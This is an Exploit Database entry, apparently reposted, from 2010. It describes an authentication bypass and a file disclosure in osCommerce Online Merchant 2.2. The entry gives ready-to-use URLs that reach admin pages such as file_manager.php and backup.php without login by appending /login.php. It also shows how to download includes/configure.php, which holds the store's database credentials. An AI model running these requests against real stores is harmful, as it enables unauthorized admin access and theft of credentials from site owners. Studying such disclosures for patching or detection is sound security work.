osCommerce Online Merchant 2.2 – File Disclosure / Authentication Bypass

• Exploit Database
• 12 阅读

• 作者： Flyff666
  日期： 2010-05-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12801/

• --------------------------------------------
  Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass
  --------------------------------------------
  
  Author : Flyff666
  Date : May, 30, 2010
  Location : Tangerang, Indonesia
  Time Zone : GMT +7:00
  Software : OsCommerce Online Merchant v2.2
  Tested on : All OS
  --------------------------------------------
  Email : Dream_Theatre@rocketmail.com
  gReets : Mywisdom(abang.. wkkwkwk), Kiddies, Chaer, Petimati, c4uR
  WhiteHat, Cruz3n, Gunslinger, v3n0m, z0mb13, Bumble_be
  Spykit, BobyHikaru, Fribo. all member.
  Site : Http://www.Devilzc0de.org/forum/
  Forum : Http://Indonesianhacker.or.id/
  --------------------------------------------
  
  # ByPass Page Admin :
  
  You can use this Trick if admin folder not protected by .htaccess
  
  if you Want to explore admin page without login. You can use /login.php behind the name of the file
  
  Example :
  
  http://[site]/admin/backup.php/login.php
  
  or
  
  http://[site]/admin/file_manager.php/login.php
  
  Demo :
  
  http://server/store/admin/file_manager.php/login.php
  
  You can See all file in Directory Oscommerce.. haha ;)
  
  and you can download all file with tRick above
  
  
  # File Disclosure :
  
  in : admin/file_manager.php/login.php?action=download&filename=
  
  Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
  
  Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php